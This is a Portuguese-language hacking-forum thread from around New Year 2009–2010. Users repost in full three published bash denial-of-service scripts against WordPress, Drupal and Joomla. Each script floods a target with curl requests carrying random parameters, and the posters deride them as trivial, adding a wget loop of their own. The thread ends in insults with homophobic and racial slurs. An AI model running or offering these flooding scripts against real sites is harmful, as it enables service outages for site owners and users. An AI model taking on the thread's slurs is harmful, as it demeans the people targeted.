Alguém tá querendo acabar com o mundo na virada do ano....
Mateus Pimentel says (23:24):
*carai...
*sairam uns 0day hoje com os quais dá pra derrubar metade dos sites da internet ^^
(C) Mateus Pimentel says (23:25):
http://www.exploit-db.com/exploits/10825
http://www.exploit-db.com/exploits/10826
http://www.exploit-db.com/exploits/10829
http://www.exploit-db.com/exploits/10820
Eu não considero nenhum desses como exploits e acho que o milw0rm também não consideraria, mas esse exploit-db aceita qualquer porcaria.
Acredito que a mesma quantidade de maquinas, que você teria que usar pra derrubar alguma coisa com esses "exploits", seria a mesma usando algo tipo:
while(1)
{
wget www.site.com
}
dd0s por stress é muito tosco... alias denial of service é tosco......
yeah... tenho que concordar com o Ruffl3Z
isso ai está mais para tool do que exploit... :P
pra falar a verdade eu nem tinha olhado o source, só ví o titulo nos meus feeds rss ^^
Cara esses exploits são todos iguais o_O, so uma simples observada no final deles.
Citar[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done
# Title: 0day Wordpress DOS <= 2.9
# EDB-ID: 10825
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
#!/bin/bash
#
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multime requests.
#
show_help(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done
[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done
# 2009-12-30 enJoy.
# Title: 0day Drupal DOS <= 6.16 and 5.21
# EDB-ID: 10826
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
#!/bin/bash
#
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# Drupd0s.sh
# This is a 0day DOS issue for Drupal Core that use cache stressing with random
# parameter on multime requests.
#
show_help(){
echo ""
echo " 2009 (C) Drupd0s.sh - 0day Drupal DOS <= 6.16 and 5.21"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) Drupd0s.sh - 0day Drupal DOS <= 6.16 and 5.21"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) Drupd0s.sh - 0day Drupal DOS <= 6.16 and 5.21"
echo ""
echo " usage $0 --host http://localhost/drupal/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done
[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?q=node/2&d0s=$random" > /dev/null 2>&1 &
done
# 2009-12-30 enJoy.
# Title: 0day Joomla Core <= 1.5.x com_component DOS
# EDB-ID: 10820
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
#!/bin/bash
#
# Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# jCd0s.sh
# This is a 0day DOS issue for joomla Core that use cache stressing with random
# parameter on multime requests.
#
show_help(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " usage $0 --host http://localhost/joomla/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done
[ -z "$host" ] && { show_help; exit 1; }
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/index.php?option=com_content&task=view&id=1&Itemid=1&d0s=$random" > /dev/null 2>&1 &
done
# 2009-12-30 enJoy.
[]'s
Denial of Service por stress é um problema, reconheço isso, tinha aquele exploit pro vbulletin, quando ele não forçava os usuários a digitarem uma imagem de confirmação. Só deixar teu tool fazendo um milhão de buscas por segundo.. O MySQL morria... lol.... Tinha um desse pro PHPBB também.
Mas fala sério... Mesmo talvez essa url causando bastante stress.....
curl -A Firefox -o --url
curl? HUAHUA muito lento... nem raw http e multiple threads ele sabe usar......
exploit-db decepcionando como sempre!
show_help(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <emgent@backtrack.it>"
}
show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " http://www.backtrack.it/~emgent/"
echo " emgent @ backtrack.it"
echo ""
}
show_prereq(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
show_usage(){
echo ""
echo " 2009 (C) jCd0s.sh - 0day Joomla Core <= 1.5.x com_component DOS"
echo ""
echo " usage $0 --host http://localhost/joomla/ --requests 1000"
echo ""
echo " Emanuele Gentili <emgent@backtrack.it>"
}
Echo: A única coisa que os l4m0z sabem usar.
Citação de: Negociador online 06 de Fevereiro , 2010, 12:12:14 PM
Citação de: Mateus online 31 de Dezembro , 2009, 12:27:54 AM
Alguém tá querendo acabar com o mundo na virada do ano....
Mateus Pimentel says (23:24):
*carai...
*sairam uns 0day hoje com os quais dá pra derrubar metade dos sites da internet ^^
(C) Mateus Pimentel says (23:25):
http://www.exploit-db.com/exploits/10825 (http://www.exploit-db.com/exploits/10825)
http://www.exploit-db.com/exploits/10826 (http://www.exploit-db.com/exploits/10826)
http://www.exploit-db.com/exploits/10829 (http://www.exploit-db.com/exploits/10829)
http://www.exploit-db.com/exploits/10820 (http://www.exploit-db.com/exploits/10820)
tU LAH CHUPA PAU SEU VIADO
KKKKKkkkk, Mateus achei que tu se guardava da opção sexual, mas ai cara, denuncia o Negociador ai pra PF.
Fala que ele te chamou de preto viado kkakakakakkakakaka
by KEst
Citação de: KEst online 06 de Fevereiro , 2010, 12:16:50 PM
Citação de: Negociador online 06 de Fevereiro , 2010, 12:12:14 PM
Citação de: Mateus online 31 de Dezembro , 2009, 12:27:54 AM
Alguém tá querendo acabar com o mundo na virada do ano....
Mateus Pimentel says (23:24):
*carai...
*sairam uns 0day hoje com os quais dá pra derrubar metade dos sites da internet ^^
(C) Mateus Pimentel says (23:25):
http://www.exploit-db.com/exploits/10825 (http://www.exploit-db.com/exploits/10825)
http://www.exploit-db.com/exploits/10826 (http://www.exploit-db.com/exploits/10826)
http://www.exploit-db.com/exploits/10829 (http://www.exploit-db.com/exploits/10829)
http://www.exploit-db.com/exploits/10820 (http://www.exploit-db.com/exploits/10820)
tU LAH CHUPA PAU SEU VIADO
KKKKKkkkk, Mateus achei que tu se guardava da opção sexual, mas ai cara, denuncia o Negociador ai pra PF.
Fala que ele te chamou de preto viado kkakakakakkakakaka
by KEst
Me diz... Qual foi a droga que você usou? Também quero ficar doidão assim!
Citação de: MrRuffl3Z online 06 de Fevereiro , 2010, 12:32:24 PM
Citação de: KEst online 06 de Fevereiro , 2010, 12:16:50 PM
Citação de: Negociador online 06 de Fevereiro , 2010, 12:12:14 PM
Citação de: Mateus online 31 de Dezembro , 2009, 12:27:54 AM
Alguém tá querendo acabar com o mundo na virada do ano....
Mateus Pimentel says (23:24):
*carai...
*sairam uns 0day hoje com os quais dá pra derrubar metade dos sites da internet ^^
(C) Mateus Pimentel says (23:25):
http://www.exploit-db.com/exploits/10825 (http://www.exploit-db.com/exploits/10825)
http://www.exploit-db.com/exploits/10826 (http://www.exploit-db.com/exploits/10826)
http://www.exploit-db.com/exploits/10829 (http://www.exploit-db.com/exploits/10829)
http://www.exploit-db.com/exploits/10820 (http://www.exploit-db.com/exploits/10820)
tU LAH CHUPA PAU SEU VIADO
KKKKKkkkk, Mateus achei que tu se guardava da opção sexual, mas ai cara, denuncia o Negociador ai pra PF.
Fala que ele te chamou de preto viado kkakakakakkakakaka
by KEst
Me diz... Qual foi a droga que você usou? Também quero ficar doidão assim!
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
kkkkkkkkkkkkkkk
morri de rir, tão dando cocaína pra KEST no quartel kkkkkkkkkkk
edit:
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkk
meia hora dps ainda to rindo asuhsuh, vou é dormir, a biba do darkers(Luno) cabou de acordar (online no fórum) aushhusesueh
Bjus :) :*
" * tU LAH CHUPA PAU SEU VIADO " ushuesuhseuhseesse...